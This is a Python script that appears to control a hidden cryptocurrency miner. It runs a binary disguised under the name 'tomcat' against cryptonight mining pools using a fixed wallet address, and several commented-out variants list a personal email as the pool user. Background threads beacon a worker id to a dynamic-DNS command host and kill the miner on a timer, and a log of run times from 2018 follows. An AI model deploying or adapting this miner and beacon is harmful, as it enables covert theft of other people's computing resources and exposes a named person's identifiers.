import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:12:07.413997
#2018-02-17 16:58:05.857128
#2018-02-17 18:48:01.444091
#2018-02-17 20:37:07.059915
#2018-02-17 22:23:03.811628
#2018-02-18 00:06:07.560598
#2018-02-18 01:58:06.498820
#2018-02-18 03:47:05.801252
#2018-02-18 05:34:01.649291
#2018-02-18 07:27:07.383278
#2018-02-18 09:14:04.154266
#2018-02-18 11:01:06.133428
#2018-02-18 12:47:05.441755
#2018-02-18 14:31:01.466015
#2018-02-18 16:21:06.917481
#2018-02-18 18:10:01.307261
#2018-02-18 19:56:04.063651
#2018-02-18 21:44:03.327253
#2018-02-18 23:33:05.065668
#2018-02-19 01:19:03.969848
#2018-02-19 03:07:05.668893
#2018-02-19 04:52:05.660906
#2018-02-19 06:36:04.454033
#2018-02-19 08:26:06.206656
#2018-02-19 10:15:01.522817
#2018-02-19 12:04:07.524227
#2018-02-19 13:51:07.279359
#2018-02-19 15:41:01.673919
#2018-02-19 17:27:02.138797
#2018-02-19 19:14:07.357567
#2018-02-19 21:02:03.671403
#2018-02-19 22:49:01.723046
#2018-02-20 00:34:06.263276
#2018-02-20 02:23:04.034956
#2018-02-20 04:13:05.354303
#2018-02-20 05:56:07.118075
#2018-02-20 07:42:04.695749
#2018-02-20 09:27:03.915316
#2018-02-20 11:11:02.116579
#2018-02-20 12:58:01.892902
#2018-02-20 14:42:10.568711
#2018-02-20 16:27:08.832918
#2018-02-20 18:13:06.620661
#2018-02-20 20:04:03.095972
#2018-02-20 21:50:11.025569
#2018-02-20 23:30:06.215442
#2018-02-21 01:15:07.170408
#2018-02-21 03:02:01.247987
#2018-02-21 04:49:01.768518
#2018-02-21 06:32:07.451241
#2018-02-21 08:19:06.004619
#2018-02-21 10:05:05.562750
#2018-02-21 11:52:10.268398
#2018-02-21 13:44:04.347678
#2018-02-21 15:29:09.511260
#2018-02-21 17:18:09.827566
#2018-02-21 19:05:02.209030
#2018-02-21 20:53:06.076089
#2018-02-21 22:38:05.486098
#2018-02-22 00:26:05.069288
#2018-02-22 02:16:07.813253
#2018-02-22 04:02:04.793952
#2018-02-22 05:48:01.472909
#2018-02-22 07:33:08.161531
#2018-02-22 09:23:04.510906
#2018-02-22 11:09:06.135014
#2018-02-22 12:55:08.023452
#2018-02-22 14:43:08.599723
#2018-02-22 16:27:08.265356
#2018-02-22 18:13:08.021010
#2018-02-22 20:03:03.960727
#2018-02-22 21:51:04.384107
#2018-02-22 23:40:01.750226
#2018-02-23 01:29:06.741364
#2018-02-23 03:16:05.702495
#2018-02-23 05:04:07.221520
#2018-02-23 06:50:04.404910
#2018-02-23 08:40:04.157287
#2018-02-23 10:56:04.670380
#2018-02-23 12:53:01.390642
#2018-02-23 14:37:05.644794
#2018-02-23 16:26:04.479311
#2018-02-23 18:12:09.504902
#2018-02-23 19:57:04.557530
#2018-02-23 21:40:09.259439
#2018-02-23 23:33:01.438930
#2018-02-24 01:22:01.454079
#2018-02-24 03:12:08.232395
#2018-02-24 04:57:05.513427
#2018-02-24 06:44:06.360647
#2018-02-24 08:35:08.057520
#2018-02-24 10:21:04.054022
#2018-02-24 12:16:01.380789
#2018-02-24 14:07:06.966985
#2018-02-24 15:54:02.019682
#2018-02-24 17:44:01.706745
#2018-02-24 19:29:05.195073
#2018-02-24 21:19:03.604766
#2018-02-24 23:58:05.269216
#2018-02-25 03:14:07.604037
#2018-02-25 06:51:05.287638